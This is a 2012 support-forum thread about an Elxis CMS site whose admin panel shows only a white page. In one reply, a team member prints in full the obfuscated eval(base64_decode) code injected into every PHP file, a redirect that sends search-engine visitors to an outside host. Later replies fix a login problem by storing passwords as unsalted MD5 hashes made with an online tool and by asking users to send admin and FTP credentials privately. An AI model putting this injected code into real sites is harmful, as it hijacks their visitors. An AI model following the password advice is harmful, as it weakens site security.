Elxis CMS Forum
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Bug reports and fixes
 
Pages: [1] 2
  Print  
Author Topic: White Page in administration panel in Elxis Cms  (Read 2379 times)
creativeidea
Newbie
*
Offline Offline

Posts: 2


« on: July 03, 2012, 14:51:03 »

I didn't make any change one day before i worked everything was fine . When i log in today in administration panel, it only shows black toolbar in the top.

and everything else was disappear. I repeat looks only toolbar on the top and only white page.

Did anyone know where is the problem ?

Waiting for your news ?
Thanks in advanced
Logged
webgift
Elxis Team
Hero Member
*****
Offline Offline

Posts: 3270



WWW
« Reply #1 on: July 03, 2012, 15:03:18 »

Welcome creativeidea on Elxis Community!
Can you please send me a private message including a live URL and administrator access. As i realize it wasn't an issue came from browser compatibility!
Logged

webgift
Elxis Team
Hero Member
*****
Offline Offline

Posts: 3270



WWW
« Reply #2 on: July 03, 2012, 17:44:50 »

An attack has been made on your server. All of the PHP files has been inflected with the below piece of code :
Code:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGlvcG8uMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

More details: http://forum.elxis.org/index.php?topic=7109.msg45724#msg45724
Conclusion: Take a look at the attached image


* trojan.png (0.9 KB, 294x33 - viewed 119 times.)
« Last Edit: July 03, 2012, 17:54:11 by webgift » Logged

creativeidea
Newbie
*
Offline Offline

Posts: 2


« Reply #3 on: July 03, 2012, 18:07:21 »

Did you know how to resolve this problem ?
Logged
xmanhattan
Hero Member
*****
Offline Offline

Posts: 974


If I'm still breathing, I'm doing something!


WWW
« Reply #4 on: July 03, 2012, 18:39:48 »

This happened to a client of mine.
http://www.do-my-site.net/eblog/the-tech-blog-of-do-my-site/viruses-and-trojans-do-attack-websites.html
Logged

bully
Newbie
*
Offline Offline

Posts: 19


« Reply #5 on: August 21, 2012, 06:51:09 »

I also do experience that since a while. Some of my sites I can open, when entering manually http://sitename.com/index2.php. In some site, I can't access at all the admin section.
Already a clean install of Elxis later than 9.1 does not give me access to the admin section. So, if somebody knows a how to, I would thankfully take any hint (we are holding more than 10 elxis sites).
At this moment, not one of our sites runs really clean.
I am already so far, that - with 9.1, a clean install, we can access the admin back-end, if we connect to our original database, we can't. The same same happens, if we only import data. So it seems somehow database related.
« Last Edit: August 21, 2012, 06:55:59 by bully » Logged
rentasite
Elxis Community
Hero Member
*****
Offline Offline

Posts: 3137


Web Services


WWW
« Reply #6 on: August 22, 2012, 20:21:41 »

I also do experience that since a while. Some of my sites I can open, when entering manually http://sitename.com/index2.php. In some site, I can't access at all the admin section.

That's not correct. To access the administration area, you must enter http://www.sitename.com/administrator/index.php or anything.php if you have turned ON the "Login page cloak".

* never forget the www. prefix
Logged

bully
Newbie
*
Offline Offline

Posts: 19


« Reply #7 on: August 23, 2012, 04:11:38 »

I also do experience that since a while. Some of my sites I can open, when entering manually http://sitename.com/index2.php. In some site, I can't access at all the admin section.

That's not correct. To access the administration area, you must enter http://www.sitename.com/administrator/index.php or anything.php if you have turned ON the "Login page cloak".

* never forget the www. prefix

Yes, I still get the login screen- prior it moves, that is however not the point.
And to say it ones more, if /index2.php is not entered, it's not moving after the login
Logged
xmanhattan
Hero Member
*****
Offline Offline

Posts: 974


If I'm still breathing, I'm doing something!


WWW
« Reply #8 on: August 24, 2012, 08:14:41 »

It seems odd, doesn't it that this person is not providing any additional real information.
I'm thinking that this is a new kind of spammer.
Logged

bully
Newbie
*
Offline Offline

Posts: 19


« Reply #9 on: August 24, 2012, 08:16:49 »

It seems odd, doesn't it that this person is not providing any additional real information.
I'm thinking that this is a new kind of spammer.


And which real information would you like to get Mr Thinker. I think, you think to much and wrong.
Logged
xmanhattan
Hero Member
*****
Offline Offline

Posts: 974


If I'm still breathing, I'm doing something!


WWW
« Reply #10 on: August 24, 2012, 08:19:40 »

Feel free to provide additional information to your problem.
Logged

bully
Newbie
*
Offline Offline

Posts: 19


« Reply #11 on: August 24, 2012, 08:31:43 »

Additional information? Shoe size? Shade of white after logging in?
Logged
webgift
Elxis Team
Hero Member
*****
Offline Offline

Posts: 3270



WWW
« Reply #12 on: August 24, 2012, 10:20:04 »

Can you please send me Billy access (FTP + Administrator) to your website via Private Message?
Logged

webgift
Elxis Team
Hero Member
*****
Offline Offline

Posts: 3270



WWW
« Reply #13 on: August 24, 2012, 11:19:46 »

Issues solved (as bully can verify it).
- First of all it's totally recommended to use the latest version of elxis cms. So i suggest you to upgrade it till Elxis 2009.3 Aphrodite rev 2691.
This issue caused by the time we are on Global settings task at the administrator area. When we make some change there and click save  ... Firefox ask to save the password or something like that. We must avoid this message. Otherwise it changes the password of website and we loose the existing password of logged in user.

Solution
- Connect to phpMyAdmin tool through f.e: cPanel (control panel of our website)
- Select the database -> (table) elx_users.
- Edit an administrator account
- change the existing password using this tool http://md5-hash-online.waraxe.us/
For example the md5 hash calculator for the password: elxisnautilus corresponds to 147c19aad66da49b207706f676991be4
Important: Don't use space character.
- Save the changes and login to the administrator area.

Other suggestions
- Please make the use of Login cloak page. More information on wiki: http://wiki.elxis.org/wiki/Administrator_login_page_cloak
« Last Edit: August 24, 2012, 11:21:41 by webgift » Logged

bully
Newbie
*
Offline Offline

Posts: 19


« Reply #14 on: August 24, 2012, 11:39:49 »

I can confirm, the 1st. site is now accessible.

Thanks again

In my limited understanding, I will try to recap, what I understand.

- For some reason the password has been changed/corrupted

That raises again a question for  me - why does Elxis just "accept" the "wrong"  password?

As for the cloaking page - yes, we gonna do that, one by one, since ages actually aware of that option, but we never "needed" it
Logged
Pages: [1] 2
  Print  
 
Jump to: